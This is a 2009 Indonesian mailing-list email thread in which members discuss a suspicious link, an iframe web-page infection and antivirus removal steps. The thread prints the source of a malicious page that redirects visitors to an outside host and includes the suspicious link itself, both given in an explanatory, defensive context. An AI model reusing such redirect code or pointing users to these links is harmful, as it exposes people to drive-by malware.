Hi Uskasin,
Apakah kamu memiliki source file yang terkena virusnya?
Jiakalau masih ada mungkin bisa kamu submit ke : virusscan.jotti.org untuk scan
file tersebut.
Kemudian silahkan untuk dapat mengikuti langkah-langkah sbb:
Step 1: Windows Disk Cleanup Utility ============
1 Press Windows Key + R
2 Type in: cleanmgr
3 Put a check beside: Temporary Internet Files and Temporary Files.
Optionally, you may check other options too
4 Click OK
Step 2: avast! Boot Time Scan ============
1 Double click avast! antivirus desktop icon and wait for memory test to
complete
2 avast GUI will appear. Right click anywhere on avast!'s window and select
Schedule Boot Time Scan...
3 Click Advanced options and select Move infected file to Chest on the first
dropdown list and leave the other one as it was. Click Schedule
4 You will be asked for a system restart. Click Yes to do it now or No to let
avast wait for you to manually restart your PC
NOTE: Optionally, you may enable scanning of archive files. If it
is enabled, scanning would be more thorough but would take more time
Step 3: Malwarebytes Antimalware (MBAM) ============
1 Download Malwarebyes' Antimalware here
2 Proceed to installing MBAM after downloading
3 On the last dialog box, do not forget to leave Update Malwarebytes'
Antimalware and Run Malwarebytes' Antimalware checked
4 Malwabytes' Antimalware GUI would appear, from there select Perform Quick
Scan and click Scan
5 When scan is completed, click Show Results
6 Click Remove Selected and then, a notepad file will appear.
7 On the notepad window, click File > Save As and save it on your desktop.
You may now close MBAM.
Step 4: Hijack This (HJT) ============
1 Download Trend Micro Hijack This here
2 Install HJT in C:\Program Files\Trend Micro\HijackThis (the location is
already displayed by default). Click Install
3 HJT Window will appear. Click Do a system scan and save a logfile. A
notepad file will pop-up once the scan is completed
5 Click on the Notepad window and click File > Save As and save the file on
your desktop
6 Go back here on your topic and start a reply. On the Reply window, click
Additional Options
7 Attach the two .txt files that we created and saved on your desktop (click
more attachmentsto have more slots for attaching files) or if you understand
how to use HijackThis plese go to http://hijackthis.de
NOTE: Do not have HJT fix anything yet.
Download avast antivirus di : http://www.avast.com/eng/download-avast-home.html
Thanks and Regards,
Yanto
________________________________
From: Uskasin <[email protected]>
To: [email protected]
Sent: Monday, November 16, 2009 9:56:08
Subject: [BinusNet] ANSAV - NOD - PCMAV
Kebetulan sekali lg bahas av..
Minggu lalu saya instal ANSAV di pc..
Iseng2 saya mau merubah tanggal / jam dobel klik di pojok kanan bawah, tiba2
muncul mssg THREAD FOUND.
Nama thread nya- Honey.romantic
Object location: c:\windows\system32 \rundl32. exe
Link: *ttp://s520.photobuc ket.com/albums/ w325/uskasin/ ?action=view&
current=av. jpg
(tanda bintang diganti “H”…)
1. File tersebut tidak bisa di-delete oleh ANSAV.
2. Ketika mencari file tersebut di lokasinya, saya tidak menemukan file
rundl32.exe tersebut…
3. Selain ANSAV, saya menggunakan av NOD32 versi ESSET v.4 – namun NOD
tidak menemukan thread tersebut…kenapa yah ?
4. So, posisi nya saya tidak bisa edit tanggal.
5. kemudian saya un-instal ANSAV diganti dgn PCMAV… hasilnya thread
tersebut tidak ditemukan & saya bisa edit settingan tanggal / jam.
Kenapa bs gt yah ?
Kenapa thread tersebut hanya di detect oleh ANSAV sebagai thread…
Uskasin
PT. BORAL PIPE & PRECAST INDONESIA
GRAHA MOBISEL 3RD Fl
Jl. Buncit Raya no. 139
Jakarta Selatan
www.boral.au
_____
From: binus...@yahoogroup s.com [mailto:binus...@yahoogroup s.com] On Behalf Of
Aay Cosmas
Sent: Monday, 16 November 2009 9:11 AM
To: binus...@yahoogroup s.com
Subject: Re: [BinusNet] (unknown)
Yanto Chiang, terima kasih atas infonya.
Akhirnya saya pake smadav.
Tapi anehnya setelah saya pake smadav, software excel & vypress tidak bisa
dipake.
Ok. Tq.
--- On Wed, 11/11/09, yanto chiang <HYPERLINK "mailto:yanto_ chiang%40yahoo.
com"yanto_ chi...@-yahoo. com> wrote:
From: yanto chiang <HYPERLINK "mailto:yanto_ chiang%40yahoo. com"yanto_
chi...@-yahoo. com>
Subject: Re: [BinusNet] (unknown)
To: HYPERLINK "mailto:binusnet% 40yahoogroups. com"binus...@yahoogroup -s.com
Date: Wednesday, November 11, 2009, 1:15 PM
HI Aay,
Berdasarkan referensi dari avast antivirus bahwa webpage ini telah terinfeksi
oleh HTML:i-frame yang dimana script pada webpage HTML telah di injeksi oleh
perintah, salah satu contohnya adalah sebagai berikut :
2.1 - Web page infection
Among the new features is the ability to infect Web pages on the
local machine. Whenever the file infector has an access to a file on
the hard drive, it checks whether the files is EXE, SCR, HTM, PHP, or
ASP, and then acts accordingly. For the PE files, the code discussed
above is used for the infection. For HTML pages, the virus actually
injects an iframe at the very end of the page:
NOTE: Just before the actual iframe code, we can see a string used
in the virus. This isn't added to Web pages, but to the host file.
Since the machine is already infected, the virus author doesn't want
the machine to be infected again, and therefore blocks access to the
malicious page with the host file modification.
(Source : HYPERLINK "http://securitylabs"http://securitylabs .websense.
com/content/ Blogs/3300. aspx)
Sedangkan hasil scan kami menemukan :
Source code of submitted URL:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional/ /EN">
<html>
<head>
<title>Send big files the easy way. Files too large for email attachments? No
problem!</title>
<script language="JavaScrip t1.1" type="text/javascri pt">
<!--
location.replace( "HYPERLINK "http://hisoftdream."http://hisoftdream. com");
//-->
</script>
<noscript>
</noscript>
</head>
<body>
Click here to download file
</body>
</html>
Source : HYPERLINK "http://jutaky."http://jutaky. no-ip.org/ index.php?
option=com_ content&task= view&id=19& Itemid=32
HTML:iFrame sendiri adalah sejini trojan yang dimana hacker melakukan injeksi
baik melalui Webpage ataupun Email, dimana pada saat korban melakukan atau klik
website tersebut, secara otomatis file injeksi itu akan terinstall di dalam
PC/Notebook korban.
Jadi mohon untuk tetap berhati hati dalam melakukan aktifitas dalam dunia
internet.
Proteksi diri Anda dengan tool antivirus ataupun anti rootkit ataupun anti
malware yang benar benar bisa dihandalkan.
Jenis jenis i frame dapat dibaca di: HYPERLINK
"http://www.avast."http://www.avast. com/eng/search. php?searchFor= iframe&fnc=
search〈=ENG&x=0&y=0
Thanks and Regards,
Yanto
____________ _________ _________ __
From: Aay Cosmas <aay_intermilan@ yahoo.com>
To: binus...@yahoogroup s.com
Sent: Tuesday, November 10, 2009 10:33:51
Subject: Re: [BinusNet] (unknown)
apakah ini virus ?
kalo yg sudah terlanjur klik link-nya gimana ya ?
Cara mengatasi virus ini gimana ya ?
Thanks
--- On Mon, 11/9/09, HILARIUS JANUARFIAN <hillbi...@yahoo. com> wrote:
From: HILARIUS JANUARFIAN <hillbi...@yahoo. com>
Subject: [BinusNet] (unknown)
To: to=val_hendri@ yahoo.com, thomas_...@yahoo. com, aidah...@yahoo. com,
bpkm_...@yahoogroup s.com, ka...@realta. net, beloved_niken@ yahoo.com,
tunj...@ftr. co.id, andr...@sentral- sistem.com, Ita_godilove@ yahoo.com,
TemuKeluarga@ yahoogroups. com, binus...@yahoogroup s.com
Date: Monday, November 9, 2009, 11:17 AM
HYPERLINK "http://taquarigas."http://taquarigas. com.br/swCgi9csY 4.html
[Non-text portions of this message have been removed]
New Email addresses available on Yahoo!
Get the Email name you've always wanted on the new @ymail and @rocketmail.
Hurry before someone else does!
HYPERLINK "http://mail."http://mail. promotions. yahoo.com/ newdomains/ aa/
[Non-text portions of this message have been removed]
[Non-text portions of this message have been removed]
Internal Virus Database is out-of-date.
Checked by AVG.
Version: 7.5.560 / Virus Database: 270.5.12/1599 - Release Date: 7/08/2008 8:49
PM
Internal Virus Database is out-of-date.
Checked by AVG.
Version: 7.5.560 / Virus Database: 270.5.12/1599 - Release Date: 7/08/2008 8:49
PM
[Non-text portions of this message have been removed]
Get your preferred Email name!
Now you can @ymail.com and @rocketmail.com.
http://mail.promotions.yahoo.com/newdomains/aa/
[Non-text portions of this message have been removed]
